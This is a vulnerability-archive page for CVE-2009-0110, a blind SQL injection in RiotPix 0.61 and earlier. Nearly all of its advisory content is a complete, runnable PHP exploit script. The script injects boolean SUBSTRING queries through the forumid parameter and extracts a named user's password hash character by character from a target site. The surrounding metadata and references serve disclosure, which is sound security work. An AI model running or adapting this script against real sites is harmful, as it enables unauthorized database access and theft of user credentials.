SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit


Arrow  SecurityAlert : 4893
Arrow  CVE : CVE-2009-0110
Arrow  CWE : CWE-89
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
  ExploitAlert :   5445
Arrow  Credit : cOndemned
Arrow  Published : 10.01.2009

Arrow  Affected Software : riotpix:riotpix:0.61 and previous versions
riotpix:riotpix:0.60
riotpix:riotpix:0.52
riotpix:riotpix:0.51:beta
riotpix:riotpix:.05
riotpix:riotpix:0.5



Arrow  Advisory Content :  

<?php

/*

$Id: riotpix-0.61.txt,v 0.1 2009/01/06 03:47:30 cOndemned Exp $

RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
Bug found && Exploited by cOndemned

Download :

http://www.riotpix.com/download/riotpix0_61.zip


Description :

It's just simple Blind SQL Injection exploit that gets
password hash of given user. Code is really simple -
without proxy, or error handling, but i don't think it is
important, as long as the RiotPix isn't famous script...

-------------------------------------------------------------------

Greetz:

ZaBeaTy, str0ke, sid.psycho & TWT, wojtus0007, 0in, vCore


"...What is left to die for, what is left to give..."

*/


echo "\n[~] RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit";
echo "\n[~] Bug found && Exploited by cOndemned\n";

if($argc != 4)
{
printf("[!] Usage: php %s <target_size> <username> <topic_id>\n\n",
$argv[0]);
exit;
}

list($sploit, $target, $username, $topicid) = $argv;

$charsArr = array(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100,
101, 102);
$pos = 1;

echo "[~] Password Hash : ";

while($pos != 33)
{
for($i = 0; $i <= count($charsArr); $i++)
{
$query =
"/read.php?forumid=$topicid+AND+SUBSTRING((SELECT+password+FROM+users+WHERE
+username='$username'),$pos,1)=CHAR({$charsArr[$i]})--";
$source = file_get_contents($target . $query);

if(!eregi('existent', $source))
{
printf("%s", chr($charsArr[$i]));
$pos++;
break;
}
flush(STDOUT);
}
}

echo "\n[~] Done\n\n";

?>



Arrow  References :

http://securityreason.com/expldownload/1/5445/1 (Exploit)
http://www.securityfocus.com/bid/33129
http://www.milw0rm.com/exploits/7679
http://secunia.com/advisories/33395




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.